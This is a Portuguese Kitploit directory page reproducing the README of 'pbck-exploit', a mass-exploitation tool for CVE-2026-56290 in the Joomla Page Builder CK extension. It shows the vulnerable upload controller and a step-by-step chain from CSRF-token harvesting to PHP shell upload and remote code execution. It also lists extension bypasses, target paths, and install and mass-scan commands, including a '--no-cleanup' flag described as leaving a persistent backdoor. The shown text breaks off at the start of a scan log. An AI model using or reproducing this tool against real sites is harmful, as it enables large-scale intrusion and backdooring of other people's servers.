Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pbck-exploit — 📤 Framework de exploração em massa para CVE-2026-56290 — upload de arquivo não autenticado para RCE no Page Builder CK Joomla | Kitploit
Ferramentas/GitHubGitHub/shinthink/pbck-exploit
ReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubshinthink/pbck-exploit

pbck-exploit

📤 Framework de exploração em massa para CVE-2026-56290 — upload de arquivo não autenticado para RCE no Page Builder CK Joomla

Ver Repositório
315há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PBCK-Exploit — Exploit do Joomla Page Builder CK CVE-2026-56290

Python CVE License

Discovery CSRF RCE Cleanup Live

Framework de Exploração em Massa e Validação para o Joomla Page Builder CK

Upload Não Autenticado de Arquivos Arbitrários → Execução Remota de Código



📑 Índice

  • Visão Geral da Vulnerabilidade
  • Versões Afetadas
  • Recursos
  • Instalação
  • Uso
  • Prova de Conceito
  • Análise Técnica Detalhada
  • Metodologia de Detecção
  • Defesa e Mitigação
  • Isenção de Responsabilidade
  • Referências

🔴 Visão Geral da Vulnerabilidade

CVE-2026-56290 é uma vulnerabilidade de severidade crítica no Page Builder CK (com_pagebuilderck), uma extensão popular de construtor de páginas para Joomla. O método browse.ajaxAddPicture do controlador aceita uploads de arquivos não autenticados com um caminho de destino controlado pelo usuário, permitindo que atacantes gravem arquivos PHP arbitrários em diretórios acessíveis pela web.

A Causa Raiz

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

O parâmetro path passa por apenas sanitização com trim() — sem whitelist, sem verificação de traversal de diretórios, sem barreira de autenticação. Combinado com um token CSRF publicamente acessível em qualquer página do Joomla, atacantes podem enviar remotamente shells PHP para qualquer diretório gravável.

Impacto

VetorSeveridadeImpacto
Upload Não Autenticado de Arquivo9.8 (Crítica)Execução arbitrária de código PHP
Coleta de Token CSRF5.3 (Média)Viabiliza a cadeia de upload
Divulgação de Informações5.3 (Média)Identificação da versão da extensão

A Cadeia de Ataque

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 Versões Afetadas

Versão do Page Builder CKStatusNotas
3.1.1 e anteriores🔴 VulnerávelUpload não autenticado confirmado
3.4.10 e anteriores🔴 VulnerávelFaixa estendida conforme análise
3.5.10 e anteriores🔴 VulnerávelAlgumas variantes corrigidas podem existir
> 3.5.10🟢 Possivelmente CorrigidaVerifique via XML do manifesto

Nota: A versão é detectada a partir do arquivo de manifesto do Joomla em /administrator/manifests/files/com_pagebuilderck.xml. Se o manifesto estiver inacessível, o scanner trata o alvo como potencialmente vulnerável por padrão.


✨ Recursos

🔍 Reconhecimento

  • Detecção de Joomla — 2 fases: fingerprints de HTML + sondagem do painel administrativo
  • Detecção de PBCK — Sondagem direta de caminhos + correspondência de padrões HTML
  • Extração de versão — Parsing do XML do manifesto + fallback de regex HTML
  • Coleta de token CSRF — Extração de tokens em múltiplas páginas (início, login, registro, admin)
  • Força bruta de endpoints — Mais de 1000 combinações de task/param/caminho com descoberta com orçamento de tempo

💀 Exploração

  • Bypass de 40+ extensões — Variações de maiúsculas, variantes numeradas, extensões duplas, truques para Windows
  • 20+ caminhos de destino — Diretórios da extensão, diretórios graváveis do Joomla, caminhos de traversal
  • Validação de shell — Confirmação baseada em token de que o PHP executa
  • Limpeza automática — Shells se autodestroem após a validação (?cleanup=1)
  • Saída TXT ao vivo — Resultados em tempo real com segurança de thread gravados em arquivo
  • Relatório JSON — Relatório estruturado com detalhes completos por alvo

📦 Instalação

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

Requisitos

requests>=2.28.0
urllib3>=1.26.0

📖 Uso

Argumentos de Linha de Comando

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

Uso Básico

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

Formato do Arquivo de Alvos

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 Prova de Conceito

Cenário 1: Varredura em Massa com Saída ao Vivo

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────
Baixar ferramenta